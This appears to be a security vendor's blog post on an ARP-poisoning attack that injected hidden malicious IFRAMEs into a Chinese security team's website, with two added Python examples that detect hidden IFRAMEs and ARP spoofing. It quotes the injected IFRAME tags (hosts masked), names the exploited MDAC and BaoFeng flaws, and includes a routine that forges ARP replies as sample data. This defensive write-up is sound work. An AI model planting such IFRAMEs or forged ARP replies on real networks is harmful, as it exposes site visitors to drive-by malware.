Over the last couple of months, we have discussed several times how public and commercial web hosting services can be abused to host malware and exploits and to send spam.

This week was the “golden week” holiday season in China, and attackers decided it was a good opportunity to catch administrators off guard. The Chinese Internet Security Response Team (C.I.S.R.T.) announced on their blog on Tuesday, October 2nd, that malicious IFRAMEs had been inserted into several of their web pages. McAfee Avert Labs got in touch with C.I.S.R.T. researchers quickly to understand the impact and the method of intrusion.

According to C.I.S.R.T.’s own investigation, it was an ARP poisoning attack originating from inside the web hosting provider’s network. And you guessed it, the provider’s engineers are away for the week.

ARP poisoning is a man-in-the-middle attack: a machine on the same network segment sends forged ARP replies so that the gateway and the web servers each send their traffic to the attacker’s MAC address instead of to each other. Once the HTTP responses pass through the attacker’s machine they can be rewritten on the fly, which is why the injected code shows up in pages served to visitors while the files on the web server itself are untouched. On the C.I.S.R.T. website, the following malicious IFRAME was inserted into existing web pages:

<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>

In our research, we found at least two vulnerabilities targeted by the obfuscated exploits inserted into the web pages: Exploit-MS06-014 (the MDAC RDS.Dataspace ActiveX flaw reachable from Internet Explorer) and Exploit-BaoFeng.a, which targets a popular Chinese media player. Both vulnerabilities had already been patched by their respective vendors. A quick check of several other virtual hosts at the same provider turned up at least one more web site injected with a malicious link:

<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>
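A check a site owner can run on a page fetched from outside the provider’s network, as an added example that is not from the original post or from C.I.S.R.T. or McAfee: parse the HTML and report every IFRAME that is collapsed to zero size, hidden by CSS, or loaded from a host other than the page’s own. Because the injection happens in transit, the same page fetched on the server itself (from localhost) should come back clean, and the difference pins the problem on the network path rather than on the files. The sample page below is constructed for this example; it embeds the two injected tags quoted above next to legitimate frames, and the hostname www.example.org is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


def _hidden_dimension(value):
    """True when a width/height attribute collapses the frame to 0 or 1 pixel."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    try:
        return int(v) <= 1
    except ValueError:
        return False


class HiddenIframeAudit(HTMLParser):
    """Collects <iframe> tags that are invisible to the visitor or point off-site.

    page_host is the hostname the page was fetched from; any other host is third party.
    """

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # html.parser also handles the unquoted attribute form used by the injected tags.
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        style = a.get("style", "").replace(" ", "").lower()
        reasons = []
        if _hidden_dimension(a.get("width")) or _hidden_dimension(a.get("height")):
            reasons.append("zero-size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-style")
        if host and host != self.page_host:
            reasons.append("off-site src")
        if reasons:
            self.findings.append((src, reasons))


def audit_page(html, page_host):
    """Return the suspicious IFRAMEs found in html, in document order."""
    parser = HiddenIframeAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one legitimate frame, the two injected tags seen in the
# wild (hostnames already masked), and a CSS-hidden frame on the site's own host.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="/news.html" width=300 height=200></iframe>
<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>
<p>Contact us</p>
<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>
<iframe src="/tracker.html" width=100 height=100 style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in audit_page(SAMPLE_PAGE, "www.example.org"):
        print(f"suspicious iframe {src!r}: {', '.join(reasons)}")
```

Run it once on the HTML an outside client receives and once on the same URL fetched on the server itself; if only the outside copy reports findings, the pages are being altered somewhere between the server and the visitor, which is exactly the ARP-poisoning symptom.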

ARP poisoning is old school, but it can still be deadly in a virtual domain hosting environment, where one poisoned gateway lets an attacker infect every website behind it, as seen in some instances of the HTool-MPack attack that affected thousands of websites. Zhu Cheng, a colleague and researcher in McAfee Avert Labs, describes in his blog how web page code injection is achievable via ARP spoofing. Trojan tool kits such as NetSniff have this functionality built in, making it easy for attackers to carry out. On the other hand, it is a “noisy” technique: every spoofed ARP packet announces a MAC address for the gateway or server IP that contradicts the one seen before, so it can be easily detected on the wire.
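The on-the-wire detection mentioned above, as an added example that is not from the original post, from Zhu Cheng’s blog, or from any McAfee tool: parse raw Ethernet/ARP frames and alert whenever a packet claims an IP address with a MAC address different from the one pinned for it or first seen (the same idea the classic arpwatch tool implements). The frames, IP addresses and MAC addresses below are constructed for the example; the traffic shows a gateway and a web server answering each other normally, then an attacker poisoning both sides.

```python
import struct

# Ethernet II header followed by the ARP body for Ethernet/IPv4 (RFC 826 layout).
ETH = struct.Struct("!6s6sH")           # dst MAC, src MAC, ethertype
ARP = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build a raw Ethernet/ARP reply frame; used here only to construct sample traffic."""
    eth = ETH.pack(mac_bytes(target_mac), mac_bytes(sender_mac), ETHERTYPE_ARP)
    body = ARP.pack(1, 0x0800, 6, 4, ARP_REPLY,
                    mac_bytes(sender_mac), ip_bytes(sender_ip),
                    mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + body


def parse_arp(frame):
    """Return the fields of an Ethernet/IPv4 ARP frame, or None for anything else."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _dst, _src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpWatch:
    """Flags ARP packets whose sender IP->MAC binding contradicts the known one.

    pinned holds known-good bindings (the gateway, the hosts' own NICs) that an
    attacker must contradict to redirect traffic; other hosts are learned from
    their first packet. Both requests and replies are inspected, because the
    sender fields of either end up in the receiver's ARP cache.
    """

    def __init__(self, pinned=None):
        self.table = dict(pinned or {})
        self.alerts = []

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None or arp["op"] not in (ARP_REQUEST, ARP_REPLY):
            return None
        ip, mac = arp["spa"], arp["sha"]
        known = self.table.setdefault(ip, mac)   # learn on first sight
        if mac != known:
            alert = (ip, known, mac)             # (claimed IP, expected MAC, spoofing MAC)
            self.alerts.append(alert)
            return alert
        return None


def scan(frames, pinned):
    """Run every frame through one watcher and return the alerts in order."""
    watcher = ArpWatch(pinned)
    for frame in frames:
        watcher.observe(frame)
    return watcher.alerts


# Constructed sample traffic (placeholder addresses).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:11:22:33:44:01"
WEB_IP, WEB_MAC = "10.0.0.20", "00:11:22:33:44:20"
ATTACKER_MAC = "de:ad:be:ef:00:99"

SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, WEB_MAC, WEB_IP),       # gateway -> server, legitimate
    build_arp_reply(WEB_MAC, WEB_IP, GATEWAY_MAC, GATEWAY_IP),       # server -> gateway, legitimate
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, WEB_MAC, WEB_IP),      # attacker tells server "10.0.0.1 is at de:ad:..."
    build_arp_reply(ATTACKER_MAC, WEB_IP, GATEWAY_MAC, GATEWAY_IP),  # attacker tells gateway "10.0.0.20 is at de:ad:..."
    build_arp_reply(WEB_MAC, WEB_IP, GATEWAY_MAC, GATEWAY_IP),       # legitimate repeat, no alert
]

if __name__ == "__main__":
    for ip, expected, seen in scan(SAMPLE_FRAMES, {GATEWAY_IP: GATEWAY_MAC}):
        print(f"ARP spoof suspected: {ip} claimed by {seen}, expected {expected}")
```

Pin the gateway and the servers’ own bindings rather than relying on first-seen learning alone: an attacker who starts poisoning before the watcher does would otherwise be learned as the legitimate owner of the address, and only the real gateway’s later packets would raise alerts.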

If you had planned to review your website’s security and discuss it with your service provider, now might be a good time.
